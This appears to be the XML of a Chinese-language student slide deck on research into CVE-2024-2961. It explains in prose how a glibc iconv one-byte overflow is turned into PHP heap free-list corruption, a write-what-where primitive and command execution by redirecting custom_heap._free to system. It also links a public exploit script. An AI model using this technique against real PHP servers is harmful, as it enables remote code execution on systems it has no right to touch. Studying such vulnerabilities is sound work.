            <a:ext cx="2563589" cy="159319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入您的公司名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Logo/Slogan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8524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FA43A29-C02F-8993-8E55-0A862631D325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516000" y="776923"/>
            <a:ext cx="11160000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="accent2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224BEAB-E1A3-5D72-8C9F-C761119032C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516000" y="6543041"/>
            <a:ext cx="11160000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="accent2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2" r:id="rId2"/>
    <p:sldLayoutId id="2147483658" r:id="rId3"/>
    <p:sldLayoutId id="2147483657" r:id="rId4"/>
    <p:sldLayoutId id="2147483649" r:id="rId5"/>
    <p:sldLayoutId id="2147483651" r:id="rId6"/>
    <p:sldLayoutId id="2147483659" r:id="rId7"/>
  </p:sldLayoutIdLst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6055" indent="-186055" algn="l" defTabSz="742950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90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6719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20434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4149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7863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31578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E011A0-5DCC-C85E-256D-1BE092D867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787" y="701902"/>
            <a:ext cx="2656661" cy="249299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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2023211561 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>窦子涵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D6BEEEE-0D32-3C45-A369-B51AB6172BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093029" y="2169795"/>
            <a:ext cx="4972593" cy="33451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>
            <a:lvl1pPr indent="0" algn="dist" defTabSz="742950">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:def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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55753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950"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="92900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625"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="130048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4pPr>
            <a:lvl5pPr marL="167195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5pPr>
            <a:lvl6pPr marL="204343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6pPr>
            <a:lvl7pPr marL="241490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7pPr>
            <a:lvl8pPr marL="278638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8pPr>
            <a:lvl9pPr marL="315785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9pPr>
          </a:lstStyle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CA2FF2B-C3DA-5047-A266-4D53BADE1DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874301" y="2623567"/>
            <a:ext cx="5035294" cy="14773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lang="zh-CN" altLang="en-US" sz="96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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>漏洞调研</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="96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srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题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5569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A5F3-B998-1F25-EDE4-BD3DA3853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FB2A2B79-6534-4ADA-613E-7B00A8E08A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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62F7312-CEEC-DA3D-41FF-3A7565F38E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127033" y="1662781"/>
            <a:ext cx="24481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漏洞原理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FCE6281-B9C5-FAE9-C3EB-56B12844F3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="2777055"/>
            <a:ext cx="10843544" cy="369992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iconv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将其他字符集转换为 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ISO-2022-CN-EXT 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时出现越界写入，以“劄”为例，其直接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encode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结果为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7EC699"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xe5\x8a\x84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”，而经过</a:t>
            </a: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iconv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的转换时，它变成了“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x1b\x24\x2A\x48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”，显然溢出一字节，这里就是利用的关键。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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PHP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堆中的空闲列表是一个单向链表，每个未分配的块在其前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8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个字节内包含指向下一个空闲块的指针。如果存在块之间的溢出，就会覆盖掉该指针，而即使只有一字节溢出，我们也能改变空闲列表指针，从而更改空闲列表，进而产生利用场景。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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CVE-2025-1302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利用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EXP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https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py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605F81E-D8AB-72C8-AFC6-DB1838CA4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140" y="1662781"/>
            <a:ext cx="5740695" cy="11113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A3E8DA-088A-F566-47A9-035B22444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25" y="1073592"/>
            <a:ext cx="3334470" cy="1172444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CBDDFB-799B-13B6-4A36-75722D24E0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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{386116E5-6C19-12A4-AFD1-C75B665E78D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId4">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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  <a:lvl2pPr marL="557530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9005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480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955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430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905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380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855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1800"/>
              <a:t>CVE-2024-2961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74827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1A44A-31E0-5072-9A88-29C10175D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6D9603B-AB92-B582-3AD8-8C6729C9BFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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614A93-D273-9A99-EDD3-482F0E362145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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F65499-33E5-4DC8-F79E-C4E0AE7834EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="2984804"/>
            <a:ext cx="10843544" cy="32844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1. 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使用</a:t>
            </a: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zlib.inflate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过滤器，将流膨胀到大小为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0x8000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的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bucket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中。该过滤器接收流并对其进行解压缩处理。为此目的，它会分配一个大小为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8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页（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0x8000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字节）的缓冲区并将流膨胀至其中。如果这个缓冲区不足以容纳全部数据时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它将再创建一个相同大小的新的缓存区域以存储剩余部分；以此类推。每次扩充出来的每个区块都会被加入到各自的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bucket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当中去。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2. 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使用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dechunk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方法调整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bucket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大小，使其可以进入空闲列表。该过滤器用于解码经过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HTTP-chunked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编码的字符串。为了解决上述问题实现在每个桶中提供一个大小和一个数据块，不再简单地写入一个大小，而是在其前面填充大量的零，以实现在每个桶的最后不会读到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作为结束标志，而是将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作为下一个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chunk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的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size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的一部分读入用于分配内存。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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FF40AF-2207-3DF8-EF50-EA5D356C5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771" y="875266"/>
            <a:ext cx="4157297" cy="19942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EFB1D7-F25F-017A-6981-F191CBAC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887" y="875266"/>
            <a:ext cx="4157297" cy="2094306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2495DCF-B8ED-0AFF-EC64-006E5037E5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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5D415E-4B36-A2CB-DEF3-A6ECB528B1F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId4">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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  <a:lvl2pPr marL="557530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9005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480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955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430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905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380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855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1800"/>
              <a:t>CVE-2024-2961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6275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59611-6E80-4C0C-6D01-A732A07B0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B0C789D-1DD4-3CCD-272E-8E25A707904C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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86A4787-DFF7-031A-4F85-2578588B6ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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218219F-0146-67B7-1A81-42E27B51E330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568408" y="3702669"/>
            <a:ext cx="10843544" cy="245342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3. write-what-where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漏洞（分配任意地址）：由于已经通过分配大量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0x100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大小的块成功填充了堆，所以在内存中的某个位置有三个连续的空闲块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A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B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和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C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，其中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A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是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FL[100]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的头，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A-&gt;B-&gt;C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。可以分配这三个块（步骤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），然后再次释放它们（步骤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）。此时，空闲列表被反转：我们得到的是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C→B→A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。接着再次进行分配，但这次在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C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的偏移量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48h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处放置一个任意指针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0x1122334455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（步骤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4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）。再次释放它们（步骤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5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）后，状态与步骤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完全相同（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A→B→C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），但有一个小差异：在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C+48h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处存在一个任意指针。现在可以从块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A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执行溢出操作，这将改变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B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中包含的指针的位置。它现在指向了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C+48h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的位置，结果使得空闲列表变为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1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B→ C+48h → 0x1122334455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DCD54F-60AA-4534-631D-252F1AE25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289" y="319256"/>
            <a:ext cx="8618464" cy="3383413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A98749-A933-6074-6B5E-98C71BE2F5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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DC88BBB-3AF7-7D29-50AA-1C5977CCEF04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId3">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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  <a:lvl2pPr marL="557530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9005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480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955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430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905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380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855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1800"/>
              <a:t>CVE-2024-2961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521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FCF7B-BEE8-6AB8-5C52-2AA4C4393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E797C735-AF87-02D7-9C1A-8F19B97AE864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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41CA1BC-913C-88F9-2FEE-04B7AACB769F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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C26B69C-31A1-1FD0-3777-265A55E12C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616536" y="3906796"/>
            <a:ext cx="10843544" cy="245342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4. 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由于对齐方式（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~0x1fffff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）和大小（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2MB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），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PHP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堆很容易识别，而在其顶部存在一个很有用的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_</a:t>
            </a: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zend_mm_heap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结构：首先，它控制了所有的自由列表。通过重写这些自由列表，我们能够获得任意数量、任意大小的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write-what-where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漏洞。利用这些漏洞，我们可以覆盖最后一个字段</a:t>
            </a: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custom_heap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，该字段包含了</a:t>
            </a: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emalloc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()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、</a:t>
            </a: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efree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()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和</a:t>
            </a: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erealloc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()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的替代函数（类似于</a:t>
            </a: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glibc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中的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__</a:t>
            </a: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malloc_hook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及其同类）。接着，我们将</a:t>
            </a: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use_custom_heap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设置为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，并对一个桶调用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free()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方法，这样就能实现对一个可控参数的任意函数调用，此处将 </a:t>
            </a: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custom_heap._free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设置为 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system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函数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这样就可以在环境中执行任意的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bash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命令了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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B30D9B-36EA-C1F5-A703-48CE90B7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079" y="946056"/>
            <a:ext cx="6136105" cy="2831860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535BEE-E597-8852-D588-039A0F3248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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6AB539A-161B-EBC2-B0A1-D60C92A65234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="253980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId3">
              <a:lum/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55531" t="-789610" r="-532395" b="-2824122"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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  <a:lvl2pPr marL="557530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29005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00480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71955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3430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905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380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855" indent="-186055" algn="l" defTabSz="742950" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1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1800"/>
              <a:t>CVE-2024-2961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39392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5A8ECDCC-7AC5-8603-C174-F08A673A6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788" y="701902"/>
            <a:ext cx="2727098" cy="249299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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2023211561 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>窦子涵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0009D8-88C6-987D-06D5-AFB51F35B2C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2197100" y="3702685"/>
            <a:ext cx="8073390" cy="61531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lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>THANKS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6FBC6A-65B7-0A0A-2512-F4E2645F9672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608705" y="2418715"/>
            <a:ext cx="5250180" cy="12299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8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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>感谢观看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CD7E87D-E83B-39B6-A662-35EFF1FE87A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538845" y="3042285"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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878205A-7422-6322-A3C4-5AB4193219A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3601085" y="2147570"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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6AD03B7-FD74-A630-CB78-E117CD606C23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917065" y="4593590"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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351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文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{985D5D24-F693-267B-E675-50327757FE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760449" y="3554503"/>
            <a:ext cx="3391954" cy="451534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lvl1pPr marL="186055" indent="-186055" defTabSz="742950">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55753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950"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="92900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625"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="130048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4pPr>
            <a:lvl5pPr marL="167195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5pPr>
            <a:lvl6pPr marL="204343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6pPr>
            <a:lvl7pPr marL="241490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7pPr>
            <a:lvl8pPr marL="278638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8pPr>
            <a:lvl9pPr marL="315785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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2025-1302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D653D61-1CF8-5750-9F08-3F07CCFB33F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1928599" y="3485654"/>
            <a:ext cx="837565" cy="534035"/>
            <a:chOff x="2133600" y="3202305"/>
            <a:chExt cx="837565" cy="534035"/>
          </a:xfrm>
        </p:grpSpPr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4ECFCBEB-4869-3D50-7202-A72C074EB2FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="3202305"/>
              <a:ext cx="837565" cy="534035"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="14280000" scaled="0"/>
            </a:gra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altLang="zh-CN" sz="1200" i="1"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</a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4CA331-04E1-58FF-ABAF-290C7D3911AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2261870" y="3223260"/>
              <a:ext cx="581025" cy="492125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 anchorCtr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sz="2400" i="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  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
                  <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
